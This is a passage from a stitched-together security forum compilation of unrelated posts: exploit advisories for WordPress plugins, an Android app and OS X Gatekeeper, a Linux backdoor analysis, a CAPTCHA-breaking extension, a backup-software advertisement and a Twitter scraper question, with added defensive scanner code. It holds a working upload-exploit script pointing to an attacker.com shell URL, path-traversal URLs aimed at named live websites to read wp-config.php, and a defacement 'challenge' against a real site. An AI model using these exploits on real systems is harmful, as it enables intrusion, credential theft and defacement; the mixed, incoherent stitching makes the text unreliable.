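    default_exported = min_sdk <= 16 or target_sdk <= 16
    findings = []
    for prov in root.iter("provider"):
        exported = _android_attr(prov, "exported")
        is_exported = default_exported if exported is None else exported.lower() == "true"
        if not is_exported:
            continue
        guarded = any(_android_attr(prov, a)
                      for a in ("permission", "readPermission", "writePermission"))
        if guarded:
            continue
        how = 'android:exported="true"' if exported is not None else "exported by SDK default"
        findings.append((_android_attr(prov, "authorities"), how + ", no read/write permission"))
    return findings


if __name__ == "__main__":
    for authority, reason in exposed_providers(VULNERABLE_MANIFEST):
        print(f"{authority}: {reason}")
```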
  12. Reflected File Download (RFD) is a web attack vector that enables attackers to gain complete control over a victim's machine by virtually downloading a file from a trusted domain.

Read more: http://dl.packetstormsecurity.net/papers/presentations/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf
  13. Samhain is a file system integrity checker that can be used as a client/server application for centralized monitoring of networked hosts. Databases and configuration files can be stored on the server. Databases, logs, and config files can be signed for tamper resistance. In addition to forwarding reports to the log server via authenticated TCP/IP connections, several other logging facilities (e-mail, console, and syslog) are available. Tested on Linux, AIX, HP-UX, Unixware, Sun and Solaris. Changes: Added non-existent file to the regression test config. Multiple bug fixes. Link download: here Link project: Samhain Labs | samhain
  14. Oren Hafif reported a new kind of attack called Reflected File Download (https://www.blackhat.com/eu-14/briefings.html#reflected-file-download-a-new-web-attack-vector) at the Black Hat Europe 2014 conference. More details about the attack can be found in his public presentation: https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf. Google and Bing have already fixed the vulnerability but I've found the same vulnerability in the AOL Search website. A malicious user could send the link below to a victim, who would download a malicious batch file from the autocomplete.search.aol.com domain.

In the link below we have searched for 'iramar "||calc||' using the AOL autocomplete domain. The browser will encode the double quotes but the server will escape it (\") and return it inside the JSON in the response body. Since the response has the header "Content-Type: application/x-suggestions+json;charset=UTF-8", the browser will automatically try to download the reflected file. Chrome didn't try to download the file but Internet Explorer and Firefox will.

http://autocomplete.search.aol.com/autocomplete/get;calc.bat?q=iramar"||calc||&it=ws-landing&dict=en_us_search&count=8&output=json

REQUEST

```
GET http://autocomplete.search.aol.com/autocomplete/get;calc.bat?q=iramar%22||calc||&it=ws-landing&dict=en_us_search&count=8&output=json HTTP/1.1
Host: autocomplete.search.aol.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ...
Connection: keep-alive
```

RESPONSE

```
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 10:30:34 GMT
Server: Apache-Coyote/1.1
Content-Type: application/x-suggestions+json;charset=UTF-8
Content-Language: en-US
Content-Length: 24
Keep-Alive: timeout=5, max=10
Connection: Keep-Alive

["iramar\"||calc||", []]
```

Source
  15. Product Description Complete Windows Backup Software for PCs, Laptops, and Workstations. Backup: easily and safely save everything, including system, disk, partition and individual files. Restore: fast and reliable disaster recovery, supporting sector alignment and selective restoration. Clone: step-by-step transfer OS or upgrade hard drive without reinstalling Windows and applications. Utilities: command line backup, merge images, backup schemes, make bootable discs, VSS, etc. Backup Features: File Backup: back up your files and folders automatically or manually to ensure you don’t lose anything from now on. System Backup: one-click back up Windows, settings, applications and the files required for computer to boot. Disk & Partition Backups: flexibly choose entire hard drive or separate partitions to backup, including dynamic disk volumes. Schedule Backup: set up a schedule to back up your system and all files automatically, supporting daily, weekly, and monthly. Incremental & Differential Backups: on the basis of a full backup, save time and storage space by only backing up changed files. Backup Scheme: automatically delete the obsolete backup images based on specified value – the age and the number. Command Line Backup: make backups from command prompt or by creating a batch (.dat) file for unattended processing. Backup to Internal & External Storage Devices: support SCSI, IDE, SATA hard drives, external USB hard drives and all flash drives. Backup to CD/DVD: support CD-R/RW, DVD-R/RW, DVD+R/RW, BD-R. Backup to NAS/Share Network: set Network-Attached Storage (NAS) or share network as the destination path to easily backup. Restore Features: File Restore: Restore backed-up versions of files & folders that are lost, damaged, or changed accidentally, like emails, music, movies, etc. System Restore: Return your computer’s system files and programs to an earlier state when everything was working properly. 
Disk & Partition Restore: Completely recover the entire hard disk, partition or dynamic disk volume to the point you ever backed up. Selective File Restore: Just recover individual files what you need from disk & partition images without restoring the entire image to save time. Clone Features: Clone Disk: copy a hard drive to another one or solid state drive (SSD) without reinstalling Windows and applications. Clone Partition: create an exact duplication of your system or data partition, and transfer it to another place. Utilities & Tools: Merge Backup Images Combine full backup and its chained incremental backups into a single backup for better management. Check and Explore Images Verify data integrity of image file to ensure it can be restored successfully. Mount image file as a virtual partition to browse the contents in Windows Explorer. Encrypt and Compress Images Protect image file from unauthorized access with a password. Set the level of compression used for backing up process to save time or save storage space. Comment and Split Backups Add a comment for backup image so that it can be identified easily. Large backups can be split into multiple smaller image files or split to fit for fixed length media. Split and Delete Backups Large backups can be split into multiple smaller image files or split to fit for fixed length media. Delete a backup task or together with its backup image files. Export/Import Tasks and Logs Management Export all backup tasks stored in an XML file which can be imported later. View what operations the program has done and record the events that occur during a backup process. Email Notifications and VSS Send backup completion status to your email by using your own mail server or AOMEI SMTP server. Microsoft Volume Shadow (VSS) allows you to back up files that are in use, especially for open and locked files backup. Create Bootable Rescue Media Make Windows PE & Linux bootable CD/DVD or USB flash drive. 
It can be useful to recover if your computer cannot boot. Supports manually adding additional drivers when creating Windows PE bootable media.

YOU CAN ALSO TRY THESE FREEWARE:

AOMEI PE Builder (PE Builder - Create Bootable USB or CD/DVD based on Windows PE with AOMEI PE Builder): This freeware helps you make a bootable environment based on Windows PE without installing AIK/WAIK easily, which integrates a set of tools that enables you to boot up your computer for easy maintenance and fast recovery tasks when the native system is corrupted or cannot be used.

AOMEI OneKey Recovery (One Key Recovery - Create a Factory Restore Partition with AOMEI OneKey Recovery): This is also a freeware; as its name suggests, it can create a factory restore partition and ONE KEY backup system for all types of desktops and laptops.

AOMEI PXE Boot (Free PXE Boot Software and Network Booting Tool for Windows 8.1/8/7/XP/Vista): This freeware aims to boot your multiple computers from an image via network. Its mode is Client/Server. It is easy to use. It also supports synchronous boot of multiple computers. One of the advantages is that it supports bootable micro-system created by you.
  16. #Level : Medium.
#Target : h~~p://www.webinvestgroup.com.br
#List: h~~p://www.webinvestgroup.com.br/wp-includes/x.txt

To solve this challenge, put the nickname in the file "x.txt". Please replace "~~" with "tt".
  17. Security researchers with Russian anti-virus company Doctor Web have examined a complex, multi-purpose backdoor for Linux. This malicious program can execute various commands issued by intruders, such as mounting DDoS attacks and performing a wide range of other malicious tasks. To spread the new Linux backdoor, dubbed Linux.BackDoor.Xnote.1, criminals mount a brute force attack to establish an SSH connection with a target machine. Doctor Web security researchers believe that the Chinese hacker group ChinaZ may be behind this backdoor.

Once Linux.BackDoor.Xnote.1 gets in, it checks whether a copy of itself is already running in the infected system. If it is, the backdoor exits. The malware will only be installed in a system if it has been launched with superuser (root) privileges. During installation, the malware creates a copy of itself in the /bin/ directory in the form of a file called iptable6. It then deletes the original file that was used to launch it. Linux.BackDoor.Xnote.1 also searches the /etc/init.d/ directory for a script that starts with the line "#!/bin/bash" and adds another line to it so that the backdoor will be launched automatically.

The program uses the following routine to exchange data with the intruders' control server. To obtain configuration data, the backdoor looks for a special string in its body (the string points to the beginning of the encrypted configuration block), then decrypts that block and starts sending queries to the control servers on the list until it finds a responding server or until the list ends. Both the backdoor and the server use the zlib library to compress the packets they exchange. First, Linux.BackDoor.Xnote.1 sends information about the infected system to the server. It then goes into standby mode and awaits further instructions.

If the command involves carrying out some task, the backdoor creates a separate process that establishes its own connection to the server, through which it gets all the necessary configuration data and sends the results of the executed task. Thus, when commanded to do so, Linux.BackDoor.Xnote.1 can assign a unique ID to an infected machine, start a DDoS attack on a remote host with a specific address (it can mount SYN Flood, UDP Flood, HTTP Flood and NTP Amplification attacks), stop an attack, update its executable, write data to a file, or remove itself.

The backdoor can also perform a number of actions with files. Having received the appropriate command, Linux.BackDoor.Xnote.1 sends information about the file system of the infected computer (the total number of data blocks in the file system and the number of free blocks) to the server and stands by for other directives, which can include:
• List files and directories inside the specified directory.
• Send directory size data to the server.
• Create a file in which received data can be stored.
• Accept a file.
• Send a file to the command and control (C&C) server.
• Delete a file.
• Delete a directory.
• Signal the server that it is ready to accept a file.
• Create a directory.
• Rename a file.
• Run a file.

In addition, the backdoor can run a shell with the specified environment variables and grant the C&C server access to the shell, start a SOCKS proxy on an infected computer, or start its own implementation of the portmap server. The signature of this malware has been added to the Dr.Web virus database, so systems protected by Dr.Web Anti-virus for Linux are safe from this backdoor.

Source
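As an added defensive check that is not part of the Dr.Web write-up, the script below looks for the two persistence artefacts the analysis names: a file called iptable6 under /bin and a bash init script in /etc/init.d that has gained a line starting the backdoor. That the appended line mentions iptable6 is an assumption made for this check, and the directory tree it runs against is constructed.

```python
"""Added example (not from the analysis above): find the Xnote persistence
artefacts it describes. Directory paths are parameters so the same code
can run against a constructed sample tree or a real host."""
import os
import tempfile

BACKDOOR_NAME = "iptable6"      # copy placed in /bin/ according to the analysis
INITD_SHEBANG = "#!/bin/bash"   # the backdoor only modifies scripts starting this way


def find_backdoor_binary(bin_dir="/bin"):
    """Return the path of a file named iptable6 in bin_dir, or None."""
    candidate = os.path.join(bin_dir, BACKDOOR_NAME)
    return candidate if os.path.isfile(candidate) else None


def scan_initd_scripts(initd_dir="/etc/init.d"):
    """Return (script_path, line_number, line) for every bash init script
    containing a non-comment line that references the backdoor binary.
    Assumption: the appended launch line names iptable6."""
    hits = []
    if not os.path.isdir(initd_dir):
        return hits
    for name in sorted(os.listdir(initd_dir)):
        path = os.path.join(initd_dir, name)
        if not os.path.isfile(path):
            continue
        try:
            with open(path, "r", errors="replace") as fh:
                lines = fh.read().splitlines()
        except OSError:
            continue
        if not lines or not lines[0].startswith(INITD_SHEBANG):
            continue
        for lineno, line in enumerate(lines, 1):
            stripped = line.strip()
            if BACKDOOR_NAME in stripped and not stripped.startswith("#"):
                hits.append((path, lineno, stripped))
    return hits


def build_sample_tree(root):
    """Constructed sample: a fake /bin/iptable6, one clean bash script, one
    tampered bash script, and a /bin/sh script that must be ignored."""
    bin_dir = os.path.join(root, "bin")
    initd = os.path.join(root, "etc", "init.d")
    os.makedirs(bin_dir)
    os.makedirs(initd)
    with open(os.path.join(bin_dir, BACKDOOR_NAME), "w") as fh:
        fh.write("ELF-placeholder\n")
    with open(os.path.join(initd, "clean"), "w") as fh:
        fh.write("#!/bin/bash\n# start cron\nservice cron start\n")
    with open(os.path.join(initd, "tampered"), "w") as fh:
        fh.write("#!/bin/bash\n# iptable6 mentioned only in a comment here\n"
                 "service ssh start\n/bin/iptable6 &\n")
    with open(os.path.join(initd, "shonly"), "w") as fh:
        fh.write("#!/bin/sh\n/bin/iptable6\n")
    return bin_dir, initd


def run_on_sample():
    """Build the sample tree and return (binary_found, [(script, line_no, line)])."""
    with tempfile.TemporaryDirectory() as tmp:
        bin_dir, initd = build_sample_tree(tmp)
        binary = find_backdoor_binary(bin_dir)
        hits = scan_initd_scripts(initd)
        return (binary is not None,
                [(os.path.basename(p), n, l) for p, n, l in hits])


if __name__ == "__main__":
    found, hits = run_on_sample()
    print("backdoor binary present:", found)
    for script, lineno, line in hits:
        print("tampered init script %s:%d: %s" % (script, lineno, line))
```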
  18. Document Title:
===============
Wireless File Transfer Pro 1.0.1 - (Android) CSRF Remote Command Execution (Create, Delete)

Release Date:
=============
2015-02-10

Product & Service Introduction:
===============================
Wireless File Transfer Pro is the advanced version of Wireless File Transfer.
(Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=com.lextel.WirelessFileTransferPro )

Affected Product(s):
====================
Wireless File Transfer Pro 5.9.5 - (Android) Web Application 1.0.1
Lextel Technology

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Request Method(s):
[+] [GET]

Vulnerable Module(s):
[+] browse

Vulnerable Parameter(s):
[+] fileExplorer.html?

Affected Module(s):
[+] Index of Documents (http://localhost:8888)

Technical Details & Description:
================================
A cross site request forgery vulnerability has been discovered in the Wireless File Transfer Pro 1.0.1 Android mobile web-application. The mobile web-application is vulnerable to a combination of cross site request forgery and local command injection attacks.

Proof of Concept (PoC):
=======================
Create New Folder

<img src="http://192.168.1.2:8888/fileExplorer.html?action=create&type=folder&folderName=test1" width="0" height="0" border="0">

--- PoC Session Logs [GET] (Execution) ---
GET /fileExplorer.html?action=create&type=folder&folderName=test1 HTTP/1.1
Host: 192.168.1.2:8888
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard
Connection: keep-alive

HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 4
<a href="#" onclick="actionBrower('/sdcard/test1')">test1</a></td></td><td width="24%"></td><td width="24%">2015-02-09 18:12:19</td><td width="15%">

Delete File, Folder

<img src="http://192.168.1.2:8888/fileExplorer.html?action=deleteFile&fileName=test" width="0" height="0" border="0">

--- PoC Session Logs [GET] (Execution) ---
GET /fileExplorer.html?action=deleteFile&fileName=test HTTP/1.1
Host: 192.168.1.2:8888
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard
Connection: keep-alive

HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 30

Reference: http://localhost:8888/

Security Risk:
==============
The security risk of the cross site request forgery issue and command injection vulnerability is estimated as medium. (CVSS 4.4)

Credits & Authors:
==================
Hadji Samir s-dz@hotmail.fr

Source
  19. # Exploit Title: OS X Gatekeeper bypass Vulnerability
# Date: 01-27-2015
# Exploit Author: Amplia Security Research
# Vendor Homepage: www.apple.com
# Version: OS X Lion, OS X Mountain Lion, OS X Mavericks, OS X Yosemite
# Tested on: OS X Lion, OS X Mountain Lion, OS X Mavericks, OS X Yosemite
# CVE : CVE-2014-8826

Advisory URL : http://www.ampliasecurity.com/advisories/os-x-gatekeeper-bypass-vulnerability.html

Gatekeeper is a feature available in OS X Lion v10.7.5 and later versions of OS X. Gatekeeper performs checks on files and applications downloaded from the Internet to prevent execution of supposedly malicious and untrusted/unsigned code.

Gatekeeper provides three different settings:
- Mac App Store (Only apps that came from the Mac App Store can open)
- Mac App Store and identified developers (Only apps that came from the Mac App Store and identified developers using Gatekeeper can open)
- Anywhere

The default setting is "Mac App Store and identified developers". This setting prevents execution of any code that was not downloaded from the Mac App Store and that was not digitally signed by a Developer ID registered with Apple. For example, if the user downloads an application from an untrusted source and double-clicks on the application to execute it, OS X Gatekeeper will prevent its execution with the following warning message: "<AppName> can't be opened because it is from an unidentified developer."

(For more information on OS X Gatekeeper, see http://support.apple.com/kb/ht5290)

We found an attacker can bypass OS X Gatekeeper protections and execute unsigned malicious code downloaded by the user, even if OS X Gatekeeper is configured to only allow execution of applications downloaded from the Mac App Store (the highest security setting). The exploitation technique is trivial and requires Java to be installed on the victim's machine.

OS X Gatekeeper prevents execution of downloaded Java Jar (.jar) and class (.class) files, but this verification can be bypassed. For example:

- Create a JAR file containing the code to be executed. For example, File AmpliaTest.java:

    public class AmpliaTest {
        public static void main(String[] args) {
            try {
                Runtime.getRuntime().exec("/usr/bin/touch /tmp/AMPLIASECURITY");
            } catch(Exception e) {
            }
        }
    }

(This is just an example; of course, arbitrary code can be executed.)

    $ javac AmpliaTest.java

Be sure to compile the code for a version of Java lower than or equal to the one available on the target (for example, javac -target 1.6 -source 1.6 AmpliaTest.java; the compiled code will then work on Java versions >= 1.6).

    $ echo "main-class: AmpliaTest" > Manifest
    $ jar cmf Manifest UnsignedCode.jar AmpliaTest.class

- Create a .DMG disk image. For example:

    $ hdiutil create -size 5m -fs HFS+ -volname AmpliaSecurity AmpliaTest.dmg

- Mount AmpliaTest.dmg
- Rename UnsignedCode.jar to UnsignedCode (just remove the extension)
- Copy UnsignedCode to the AmpliaSecurity volume
- Unmount AmpliaTest.dmg
- Host the file AmpliaTest.dmg on a web server
- Download AmpliaTest.dmg using Safari and open it
- Double-click on 'UnsignedCode' and the code will be executed, bypassing OS X Gatekeeper checks (the code creates the file /tmp/AMPLIASECURITY).

(Perform the same steps without removing the .jar extension from UnsignedCode.jar and OS X Gatekeeper will prevent execution of the Jar file.)

Because the file 'UnsignedCode' has no extension, Finder will display a blank page icon; the Java/JAR icon will not be displayed. The user does not know he is double-clicking on a JAR file, and the file does not look particularly suspicious. Also, since the unsigned code is distributed inside a disk image (.DMG) file, there are many things the attacker can do to gain the trust of the user (include other files, use Finder background images, etc).

Source
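The bypass works because the check keys on the .jar extension, which the attacker simply removes. As an added example (not code from Amplia or Apple), the scanner below identifies Java archives by content instead: a ZIP whose entries include META-INF/MANIFEST.MF, executable when the manifest names a Main-Class. The sample "volume" it runs over is constructed in a temporary directory.

```python
"""Added example: flag executable JARs by content rather than by extension,
the shape of file the Gatekeeper advisory describes ('UnsignedCode')."""
import os
import tempfile
import zipfile

MANIFEST = "META-INF/MANIFEST.MF"


def jar_main_class(path):
    """Return the Main-Class named in the manifest if `path` is a JAR with an
    executable manifest, "" for a JAR without one, None if not a JAR at all.
    The file name and extension are deliberately ignored."""
    if not zipfile.is_zipfile(path):
        return None
    try:
        with zipfile.ZipFile(path) as zf:
            if MANIFEST not in zf.namelist():
                return None
            manifest = zf.read(MANIFEST).decode("utf-8", "replace")
    except (zipfile.BadZipFile, OSError):
        return None
    for line in manifest.splitlines():
        key, _, value = line.partition(":")
        if key.strip().lower() == "main-class":   # manifest keys are case-insensitive
            return value.strip()
    return ""


def find_disguised_jars(directory):
    """Return paths under `directory` that are executable JARs but do not
    carry a .jar extension."""
    found = []
    for root, _dirs, files in os.walk(directory):
        for name in files:
            if name.lower().endswith(".jar"):
                continue
            path = os.path.join(root, name)
            if jar_main_class(path):
                found.append(path)
    return sorted(found)


def build_sample_volume(root):
    """Constructed sample mimicking the mounted disk image: an executable JAR
    saved without extension, a plain text file and a ZIP with no manifest."""
    def write_zip(path, entries):
        with zipfile.ZipFile(path, "w") as zf:
            for name, data in entries.items():
                zf.writestr(name, data)
    write_zip(os.path.join(root, "UnsignedCode"),
              {MANIFEST: "Manifest-Version: 1.0\nmain-class: AmpliaTest\n",
               "AmpliaTest.class": b"\xca\xfe\xba\xbe"})   # class-file magic only
    write_zip(os.path.join(root, "data.zip"), {"readme.txt": "not a jar"})
    with open(os.path.join(root, "notes.txt"), "w") as fh:
        fh.write("plain text\n")


def run_on_sample():
    """Build the sample volume and return the base names that were flagged."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_volume(tmp)
        return [os.path.basename(p) for p in find_disguised_jars(tmp)]


if __name__ == "__main__":
    print(run_on_sample())   # ['UnsignedCode']
```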
  20. [*] Exploit Title: Wordpress RedSteel Theme Arbitrary File Download Vulnerability
[*] Google Dork: inurl:wp-content/themes/RedSteel
[*] Date: 2015-01-25
[*] Exploit Author: Ashiyane Digital Security Team
[*] Vendor Homepage: http://www.webdesignlessons.com/redsteel-wordpress-theme/
[*] Tested on: Windows 7
[*] Discovered By: ACC3SS

[*] Location: [localhost]/wp-content/themes/RedSteel/download.php?file=filename.php

Vulnerable file: download.php

Vulnerable code:

    <?php
    $file = @$_GET['file'];
    $parts = explode('/', $file);
    $fileName = $parts[sizeof($parts) - 1];
    if ((isset($file)) && (file_exists($file))) {
        header("Content-type: application/force-download");
        header('Content-Disposition: inline; filename="' . $fileName . '"');
        header("Content-Transfer-Encoding: Binary");
        header("Content-length: " . filesize($file));
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="' . $fileName . '"');
        readfile($file);
    }
    ?>

[*] Proof:
[*] http://dixonpest.com/wp-content/themes/RedSteel/download.php?file=../../../wp-config.php
[*] http://rmhctallahassee.org/wp-content/themes/RedSteel/download.php?file=download.php

Source
  21. A Firefox (>34) extension that breaks rotld.ro's audio CAPTCHA, with 100% accuracy.

Flawed implementation
RoTLD's audio CAPTCHAs are composed of 6 characters, in the a-f0-9 range. Each character is concatenated to the audio file, along with a header ("your captcha code is") and a random amount of white noise between the characters. The major flaw is that the header, noise and characters are binary concatenated to the file (i.e. cat header.mp3 a.mp3 1.mp3 6.mp3 noise.mp3 d.mp3 b.mp3 f.mp3 > output.mp3), without resynthesizing the output. One can do a simple binary search for signatures and find the CAPTCHA code.

Installation
You can install it by dragging the latest rotld_captcha.xpi file to your add-on page.

Source: https://github.com/vladc/RoTLD-Captcha
  22. Several new versions of PHP have been released, fixing a number of security vulnerabilities and other bugs in the popular scripting language. PHP 5.6.5 is the newest version of the language, and it has patches for a handful of vulnerabilities, including a use-after-free flaw that could lead to remote code execution in some cases.

“Sapi/cgi/cgi_main.c in the CGI component in PHP through 5.4.36, 5.5.x through 5.5.20, and 5.6.x through 5.6.4, when mmap is used to read a .php file, does not properly consider the mapping’s length during processing of an invalid file that begins with a # character and lacks a newline character, which causes an out-of-bounds read and might (1) allow remote attackers to obtain sensitive information from php-cgi process memory by leveraging the ability to upload a .php file or (2) trigger unexpected code execution if a valid PHP script is present in memory locations adjacent to the mapping,” the description of the vulnerability says.

There are a few other security vulnerabilities fixed in version 5.6.5, as well. One involves an initialized pointer in Exif. Another is a fix for a vulnerability that initially was patched in December. Apparently the patch did not completely fix the problem, which was identified by researcher Stefan Esser. The vulnerability is another use-after-free bug.

“There is a small but important difference to the patch I sent on 10th December. You use zend_symtable_find instead of zend_hash_find from my patch. Because of this change the fix is incomplete. It now detects attacks that try to replace a key like “AAA”, but it does not fix attacks where the key is a numerical string like “123”. The reason for this is that we do not want integer keys in objects. That is why the code was added in the first place,” Esser said in an email to the PHP maintainers. “The object properties are therefore inserted via zend_hash_update, instead of zend_symtable_update. Therefore something like “123” will be inserted as a string and not as a numerical 123. On the attempt to do the overwrite attack you now check with zend_symtable_find(). This function will turn the “123” into a numerical “123” and therefore not see that it is already there. The protection will not be executed and therefore the attack works in the same way as before.”

Source
  23. Mogwai Security Advisory MSA-2015-01
----------------------------------------------------------------------
Title: WP Pixabay Images Multiple Vulnerabilities
Product: Pixabay Images (Wordpress Plugin)
Affected versions: 2.3
Impact: high
Remote: yes
Product link: https://wordpress.org/plugins/pixabay-images/
Reported: 14/01/2015 by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)

Vendor's Description of the Software:
----------------------------------------------------------------------
Pixabay Images is a WordPress plugin that lets you pick CC0 public domain pictures from Pixabay and insert them with just a click anywhere on your blog. The images are safe to use, and paying attribution or linking back to the source is not required.

Business recommendation:
----------------------------------------------------------------------
Update to version 2.4

Vulnerability description:
----------------------------------------------------------------------
1) Authentication bypass
The plugin does not correctly check if the user is logged in. Certain code can be called without authentication.

2) Arbitrary file upload
The plugin code does not validate the host in the provided download URL, which allows uploading malicious files, including PHP code.

3) Path Traversal
Certain values are not sanitized before they are used in a file operation. This allows storing files outside of the "download" folder.

4) Cross Site Scripting (XSS)
The generated author link uses unsanitized user values which can be abused for Cross Site Scripting (XSS) attacks.

Proof of concept:
----------------------------------------------------------------------
The following PoC Python script can be used to download PHP files from an attacker-controlled host.

    #!/usr/bin/env python
    import argparse
    import httplib, urllib
    from urlparse import urlparse

    def exploit(target_url, shellcode_url):
        target = urlparse(target_url)
        params = urllib.urlencode({'pixabay_upload': 1,
                                   'image_url': shellcode_url,
                                   'image_user': 'none',
                                   'q': 'xxx/../../../../../../mogwai'})
        headers = {"Content-type": "application/x-www-form-urlencoded"}
        print "[+] Sending download request...."
        conn = httplib.HTTPConnection(target.netloc)
        conn.request("POST", target.path + "/wp-admin/", params, headers)
        response = conn.getresponse()
        response_data = response.read()
        if response.status != 200 and response_data != "Error: File attachment metadata error":
            print "[-] Something went wrong"
            print response_data
            exit()
        conn.close()

    # ---- Main code ----------------
    parser = argparse.ArgumentParser()
    parser.add_argument("target_url", help="The target url, for example http://foo.bar/blog/")
    parser.add_argument("shellcode_url", help="The url of the PHP file that should be uploaded, for example: http://attacker.com/shell.php")
    print "----------------------------------------------"
    print " pixabay upload wordpress plugin exploit PoC"
    print " Mogwai security"
    print "----------------------------------------------"
    arguments = parser.parse_args()
    exploit(arguments.target_url, arguments.shellcode_url)

Vulnerable / tested versions:
----------------------------------------------------------------------
Pixabay Images 2.3

Disclosure timeline:
----------------------------------------------------------------------
14/01/2014: Reporting issues to the plugin author
15/01/2014: Release of fixed version (2.4)
19/01/2014: Public advisory

Advisory URL:
----------------------------------------------------------------------
https://www.mogwaisecurity.de/#lab

----------------------------------------------------------------------
Mogwai, IT-Sicherheitsberatung Muench
Steinhoevelstrasse 2/2
89075 Ulm (Germany)
info@mogwaisecurity.de

Source
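Both the RedSteel download.php in item 20 and the path traversal in item 3 of this advisory take a user-supplied path fragment and use it in a file operation unchanged. As an added example, not code from either advisory or plugin, the Python below shows the fix that applies to both: resolve the requested name, refuse anything that does not land inside the intended directory, and allow-list the file types a download endpoint may serve. The directory layout and files it is run against are constructed.

```python
"""Added example: confine user-supplied file names to one directory, the
check missing from the RedSteel download.php and the Pixabay download folder."""
import os
import tempfile


class DownloadRefused(ValueError):
    """Raised for traversal attempts and disallowed file types."""


def confine_path(base_dir, user_value):
    """Return the absolute path for user_value inside base_dir, or raise.
    Resolution uses realpath, so ../ segments, absolute inputs and symlinks
    pointing outside the directory are all rejected."""
    base = os.path.realpath(base_dir)
    # An absolute input would make os.path.join discard base, so strip it.
    candidate = os.path.realpath(os.path.join(base, user_value.lstrip("/\\")))
    if candidate != base and not candidate.startswith(base + os.sep):
        raise DownloadRefused("%r escapes %r" % (user_value, base_dir))
    return candidate


def safe_download(base_dir, requested, allowed_suffixes=(".pdf", ".zip", ".txt")):
    """Mirror of the RedSteel handler with the checks it lacked: confinement to
    base_dir, an allow-list so the script cannot serve its own .php source, and
    regular files only. Returns the file's bytes."""
    path = confine_path(base_dir, requested)
    if not path.lower().endswith(allowed_suffixes):
        raise DownloadRefused("type not allowed: %r" % requested)
    if not os.path.isfile(path):
        raise FileNotFoundError(requested)
    with open(path, "rb") as fh:
        return fh.read()


def run_on_sample():
    """Constructed tree shaped like the RedSteel layout; returns the outcome
    for a legitimate name and for the inputs the two advisories show."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        theme_dir = os.path.join(tmp, "wp-content", "themes", "RedSteel")
        os.makedirs(theme_dir)
        with open(os.path.join(theme_dir, "brochure.pdf"), "wb") as fh:
            fh.write(b"%PDF-1.4 sample")
        with open(os.path.join(theme_dir, "download.php"), "w") as fh:
            fh.write("<?php readfile($_GET['file']);\n")
        with open(os.path.join(tmp, "wp-config.php"), "w") as fh:
            fh.write("<?php define('DB_PASSWORD', 'constructed-secret');\n")
        for value in ("brochure.pdf",
                      "../../../wp-config.php",          # RedSteel proof URL
                      "download.php",                    # serve own source
                      "xxx/../../../../../../mogwai",    # Pixabay 'q' value
                      "/etc/passwd"):
            try:
                safe_download(theme_dir, value)
                results[value] = "served"
            except DownloadRefused:
                results[value] = "rejected"
            except FileNotFoundError:
                results[value] = "missing"
    return results


if __name__ == "__main__":
    for value, outcome in run_on_sample().items():
        print("%-32s %s" % (value, outcome))
```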
  24. Hello,
Someone discovered how to pull followers from Twitter accounts, Collecting Twitter Followers with 25 lines of Python, and wrote a Python 2 script as follows:

"
    import tweepy
    import time

    # insert your Twitter keys here
    consumer_key = 'bla bla'
    consumer_secret = 'bla bla'
    access_token = 'bla bla'
    access_secret = 'bla bla'

    auth = tweepy.auth.OAuthHandler(consumer_key, consumer_secret)
    auth.set_access_token(access_token, access_secret)
    api = tweepy.API(auth)

    # output file for the collected screen names
    out = open('/go-to-war/Desktop/twitter_list.txt', 'w')

    if api.verify_credentials():
        print 'We successfully logged in'

    user = tweepy.Cursor(api.followers, screen_name="<targeted_twitter_account>").items()

    while True:
        try:
            u = next(user)
            out.write(u.screen_name + '\n')
        except:
            # rate limited: wait out the 15 minute window, then continue
            time.sleep(15 * 60)
            print 'We got a timeout ... Sleeping for 15 minutes'
            u = next(user)
            out.write(u.screen_name + '\n')

    out.close()
"

My question is: has anyone tried it, and did it work? I started it, it sits there until the 15 minutes allotted to a valid query interval expire, and then it exits with the following error:

"Traceback (most recent call last):
  File "twitter_followers_harvesting.py", line 28, in <module>
    u = next(user)
  File "/usr/lib/python2.7/dist-packages/tweepy/cursor.py", line 110, in next
    self.current_page = self.page_iterator.next()
  File "/usr/lib/python2.7/dist-packages/tweepy/cursor.py", line 60, in next
    cursor=self.next_cursor, *self.args, **self.kargs
  File "/usr/lib/python2.7/dist-packages/tweepy/binder.py", line 179, in _call
    return method.execute()
  File "/usr/lib/python2.7/dist-packages/tweepy/binder.py", line 162, in execute
    raise TweepError(error_msg, resp)
tweepy.error.TweepError: [{'message': 'Sorry, that page does not exist', 'code': 34}]
"

Thanks a lot.